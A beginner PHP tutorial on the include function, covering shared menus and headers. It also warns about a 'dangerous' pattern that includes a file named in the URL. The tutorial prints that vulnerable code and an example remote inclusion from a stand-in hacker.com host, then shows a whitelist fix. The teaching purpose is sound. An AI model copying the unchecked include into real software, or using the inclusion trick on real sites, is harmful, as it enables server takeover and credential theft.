We’ll go through one function only: include. It’s powerful and really easy to deal with.
What does this function do?
It enables to include the content of a PHP page in another PHP page. And it is very useful! Case in point: suppose there is a left-side menu on your website. This menu is displayed on each of your site’s pages.
Until now, you had to copy and paste this menu in all the pages. And if you had to modify it, well then you had to modify all the pages!
With the include function, just ask PHP in all pages: "Put the content of the menu.php page here".
PHP will then take the content of the menu.php page and put it where you have asked.
So if you want to change your menu, changing menu.php will automatically update all the pages of your website!
Great, isn’t it? Between you and I, that’s what made me use PHP.
Here is the procedure to include the page menu.php:
Code: PHP1
2
3 | <?php
include("menu.php");
?>
|
Simple code. PHP detects the include instruction, goes for the menu.php page and eventually substitutes it to the instruction.
Need an example? Everything is at your fingertips.
Indeed, Newbies Paradise uses the include function a lot. Here is the PHP lesson’s outline (index.php page):
The index.php page includes two files: top.php (for the logo, the ad…) and menu.php (Newbies Paradise's menu). Then comes the content itself of index.php, which is in fact the PHP lesson’s outline.
This is what the PHP code of index.php looks like:
Code: PHP 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30 | <div id="top">
<?php
// First you include the top of the page
include("top.php");
?>
</div>
<div id="menu">
<?php
// Then you include the menu
include("menu.php");
?>
</div>
<?php
// Now you put the code of the page (whatever you want)
// Obviously this code can contain PHP as well as HTML
?>
<h1>
<img src="images/elephpant.gif" alt="ElePHPant" /> A dynamic site with PHP! <img src="images/elephpant.gif" alt="ElePHPant" />
</h1>
<div class="question">
But why are all websites getting on with PHP? What use can be done of it?<br />
What is PHP By the way???
</div>
<p>Don't you trouble yourselves, dear Newbies, this tutorial is meant to explain it all :o)...</p>
|
The two included files (top.php and menu.php) come first, followed by our page’s code. All the pages of the website do work like that!
You may have noticed that I am using layers (<div> tag) for the presentation, but you can do as you want. Obviously, to insert these layers in the page (left-side menu, header on top etc.), I am using a CSS style sheet.
If you don’t know how to create the design of your website, you’ll be well advised to read the HTML tutorial available on this website. It explains how to use the <div> tags and to insert them in order to build up your design.
Well, let’s get practical now.
We want to display our website’s title on top of all pages. We are going to create a title.php page, which will be included in all pages. We will also need a test.php page to test the inclusion.
Title.php is going to contain whatever we want (HTML, PHP etc.). As far as I am concerned, I am just writing the title:
Code: HTML1 | <h2>Newbies Paradise</h2>
|
The page test.php is an example from our website. All the website’s pages will look like this one:
Code: PHP1
2
3
4
5
6
7 | <?php include("title.php"); ?>
<p>
This is an example from our website.<br />
All the pages of the website feature the inclusion on top, so that they can all display its title.<br />
If the website changes name, we will have to modify "title.php" only, and all the site's pages will be updated, just like this one!
</p>
|
Shall we give it a try? The link below will open test.php:
Just do it home, and you will see how easy it is!
Outline in pictures:
This diagram, whose ugliness is fully due to me, is a perfect illustration of what is happening. When the user requests test.php, the include instruction is replaced by the content of title.php.
At the end, the page loaded by the user will contain this code:
Code: HTML1
2
3
4
5
6
7
8 | <code type="html">
<h2>Newbies Paradise</h2>
<p>
This is an example from our website.<br >
All the pages of the website feature the inclusion on top, so that they can all display its title.<br >
If the website changes name, we will have to modify "title.php" only, and all the site's pages will be updated, just like this one!
</p></code>
|
Child’s play, isn’t it?
In theory you know everything you need but…I don’t feel like abandoning you already! I will stick with you through the second part, in which we will see how to implement the include function on your website.
Roughly speaking, we can say there are two methods to use includes on your website: the brutal one and the dangerous one. I’d rather use the former because it prevents me from keeping an open door to potential hackers.
What stories are you telling me?! 
I may have my website hacked while using included files and you don’t even tell me? 
Please stop crying, everything is going to be fine.
Actually, I was about to tell you… Pay attention to what follows.
First method: Brutal
We’ll start with my favourite, the "brutal" one
(obviously not an official term but simply how I named it
).
- Advantage: No risk of being hacked (which is why I made it my favourite).
- Drawbacks: If you want to change the entire design of your web page, you may (and we are only talking probabilities here) have to redo it all. Other thing, it looks less professional (but so much safer…).
I won’t beat around the bush, this method is easy. It involves copying and pasting the included instruction on all the pages of your website.
Code: PHP1
2
3
4
5
6
7
8 | <?php include("top.php"); ?>
<p>
This is a page X of your site.<br />
All of your pages' code follow this scheme : one included file on top, one included file at the bottom.<br />
</p>
<?php include("bottom.php"); ?>
|
You can put what you want in the pages top.php and bottom.php. For instance, in top.php I'll put the website's title and the first html tags: <html>, <head>, <title> etc... Basically what we find on top of a web page code...
In bottom.php, you can write down a copyright or the webmaster's name and eventually close the tags </body> and </html>
Second method: Dangerous
- Advantage: the design of your site can be modified quite easily without any problem. Some of you may find this code more "attractive" (if ever a code could be qualified as "attractive"
)
- Drawback: if you're not meticulous enough with the code you're writing, not only will it make your site vulnerable but it will also be quite easy to appropriate your MySQL password for instance ...
Note that this method is used by a large number of websites but, again, I do not recommend it.
The process works the opposite way here: instead of including your pages' header, the menus etc., you create a page that contains everything but its body. So you put your tags <html>, <head>, <title>, your menus, your copyright, then close the tags </body> and </html>.
This is when you are going to include the page that you want to display. For instance, if you want to include the page minichat.php, you'll do as follows :
Code: PHP 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<title>My fantastic site!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<?php
$page = $_GET['page'];
include("$page.php");
?>
<p>This site was written by Mateo21.</p>
</body>
</html>
|
How should I do if I wanted to include another page? Should I create a similar page and include my other page this time?
Not at all!
The trick here is that we are going to receive a variable with the url. You remember index.php?language=en&foo=bar, don't you? Well then in all the pages of the site, we will transmit information containing the name of the page that has to be included. Let's pick an example:
index.php?page=minichat
Now we take the code 3.1.7 again :
Code: PHP 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<title>My fantastic site!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<?php
$page = $_GET['page'];
include("$page.php");
?>
<p>This site was written by Mateo21.</p>
</body>
</html>
|
If the url contains index.php?page=minichat, then we will include minichat.php
If the url contains index.php?page=news, then we will include news.php
If the url contains index.php?page=forum, then we will include forum.php
If the url contains index.php?page=http://www.hacker.com/specialpage, then we will include
http://www.hacker.com/specialpage.php
Wait a minute, could you explain the last example?
Indeed, some explanations might be useful... Just look at the top of this web page. You can change the url easily, as well as the page that will be included!! And considering the PHP code that we have used, it is all the more easy to include a page located on another site! In this way, just by modifying the url of the page, PHP will execute this instruction:
<?php include("http://www.hacker.com/specialpage.php"); ?>
What are the risks? It is simple, I only have to modify the url to put the PHP file's address on one of my FTPs, and it is your server which will execute my page's code.
So what?
So I just need to tell PHP: "Give me this site's password".
This is how I can access a FTP I do not own, modify all the files I want to, make a total mess etc. A great deal of funny and illegal things devoid of interest, but much fun for some idiots (and I tone down my language) who want to show they are "the strongest". Hum, I am starting to lose my temper
All that matters to me is making you aware that what you are writing in PHP can endanger the security of your site. Without you even noticed, I have just introduced you to PHP security problems with this example. They are not important to you yet, but when you will be good at PHP(which will happen fast, believe me
), you'll see how careful you get with the security of your site.
No worries, we're not there yet. So you can keep on reading the PHP tutorial calmly. You'll learn all that little by little
Before we leave each other, let's see one of the solutions to solve this security problem (there are several of them).
Code: PHP 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<title>My fantastic site!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<?php
if ($_GET['page'] == "minichat")
{
include("minichat.php");
}
if ($_GET['page'] == "news")
{
include("news.php");
}
if ($_GET['page'] == "forum")
{
include("forum.php");
}
?>
<p>This site was written by Mateo21.</p>
</body>
</html>
|
If a hacker tries to change the url, none of the "ifs" will be valid so there will be nothing included. Phew!
That implies making as many if as pages your site contains, not really handy... This is why I'd rather use the first method ( and I advise you to do the same)!
Siteduzero.com
Newbiesparadise.com